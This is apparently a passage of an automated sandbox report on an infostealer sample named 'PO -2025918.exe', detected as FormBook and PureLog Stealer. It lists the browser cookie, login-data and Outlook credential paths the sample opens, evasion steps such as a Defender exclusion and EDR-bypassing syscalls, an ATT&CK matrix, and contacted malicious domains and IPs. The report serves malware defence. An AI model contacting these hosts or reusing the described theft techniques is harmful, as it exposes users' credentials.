                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Yara detected FormBook
                      Source: Yara matchFile source: 4.2.PO -2025918.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.PO -2025918.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000002.2125323216.0000000001A50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.3539706427.0000000000A90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2124637174.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.3540022925.0000000002D90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.3539953830.0000000002D40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.3543046045.0000000005840000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2126495744.0000000002050000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.3540990423.0000000002980000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Yara detected PureLog Stealer
                      Source: Yara matchFile source: 0.2.PO -2025918.exe.7040000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.PO -2025918.exe.3777590.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.PO -2025918.exe.7040000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.PO -2025918.exe.2b71520.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.PO -2025918.exe.3777590.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.PO -2025918.exe.2b71520.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.PO -2025918.exe.294f714.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1870856601.0000000003759000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1892212304.0000000007040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1865271514.00000000027A6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Windows\SysWOW64\ROUTE.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXEFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXEFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                      Tries to steal Mail credentials (via file / registry access)
                      Source: C:\Windows\SysWOW64\ROUTE.EXEKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                      Remote Access Functionality

                      barindex
                      Yara detected FormBook
                      Source: Yara matchFile source: 4.2.PO -2025918.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.PO -2025918.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000002.2125323216.0000000001A50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.3539706427.0000000000A90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2124637174.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.3540022925.0000000002D90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.3539953830.0000000002D40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.3543046045.0000000005840000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2126495744.0000000002050000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.3540990423.0000000002980000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Yara detected PureLog Stealer
                      Source: Yara matchFile source: 0.2.PO -2025918.exe.7040000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.PO -2025918.exe.3777590.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.PO -2025918.exe.7040000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.PO -2025918.exe.2b71520.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.PO -2025918.exe.3777590.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.PO -2025918.exe.2b71520.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.PO -2025918.exe.294f714.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1870856601.0000000003759000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1892212304.0000000007040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1865271514.00000000027A6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                      DLL Side-Loading                      		312
                      Process Injection                      		1
                      Masquerading                      		1
                      OS Credential Dumping                      		121
                      Security Software Discovery                      		Remote Services1
                      Email Collection                      		1
                      Encrypted Channel                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                      Abuse Elevation Control Mechanism                      		11
                      Disable or Modify Tools                      		LSASS Memory2
                      Process Discovery                      		Remote Desktop Protocol1
                      Archive Collected Data                      		3
                      Ingress Tool Transfer                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                      DLL Side-Loading                      		41
                      Virtualization/Sandbox Evasion                      		Security Account Manager41
                      Virtualization/Sandbox Evasion                      		SMB/Windows Admin Shares1
                      Data from Local System                      		4
                      Non-Application Layer Protocol                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook312
                      Process Injection                      		NTDS1
                      Application Window Discovery                      		Distributed Component Object ModelInput Capture4
                      Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      Deobfuscate/Decode Files or Information                      		LSA Secrets2
                      File and Directory Discovery                      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      Abuse Elevation Control Mechanism                      		Cached Domain Credentials113
                      System Information Discovery                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
                      Obfuscated Files or Information                      		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
                      Software Packing                      		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                      DLL Side-Loading                      		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1592062 Sample: PO -2025918.exe Startdate: 15/01/2025 Architecture: WINDOWS Score: 100 35 www.letsbookcruise.xyz 2->35 37 www.zucchini.pro 2->37 39 13 other IPs or domains 2->39 47 Multi AV Scanner detection for submitted file 2->47 49 Yara detected PureLog Stealer 2->49 51 Yara detected FormBook 2->51 55 5 other signatures 2->55 10 PO -2025918.exe 4 2->10         started        signatures3 53 Performs DNS queries to domains with low reputation 35->53 process4 file5 33 C:\Users\user\AppData\...\PO -2025918.exe.log, ASCII 10->33 dropped 67 Adds a directory exclusion to Windows Defender 10->67 14 PO -2025918.exe 10->14         started        17 powershell.exe 23 10->17         started        signatures6 process7 signatures8 71 Maps a DLL or memory area into another process 14->71 19 nWrCyfejRZk.exe 14->19 injected 73 Loading BitLocker PowerShell Module 17->73 22 conhost.exe 17->22         started        process9 signatures10 57 Found direct / indirect Syscall (likely to bypass EDR) 19->57 24 ROUTE.EXE 13 19->24         started        process11 signatures12 59 Tries to steal Mail credentials (via file / registry access) 24->59 61 Tries to harvest and steal browser information (history, passwords, etc) 24->61 63 Modifies the context of a thread in another process (thread injection) 24->63 65 3 other signatures 24->65 27 nWrCyfejRZk.exe 24->27 injected 31 firefox.exe 24->31         started        process13 dnsIp14 41 www.qzsazi.info 47.83.1.90, 50020, 50021, 50022 VODANETInternationalIP-BackboneofVodafoneDE United States 27->41 43 www.actionhub.live 67.223.117.189, 49980, 49999, 50014 VIMRO-AS15189US United States 27->43 45 6 other IPs or domains 27->45 69 Found direct / indirect Syscall (likely to bypass EDR) 27->69 signatures15

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      PO -2025918.exe53%VirustotalBrowse
                      PO -2025918.exe58%ReversingLabsByteCode-MSIL.Trojan.CrypterX
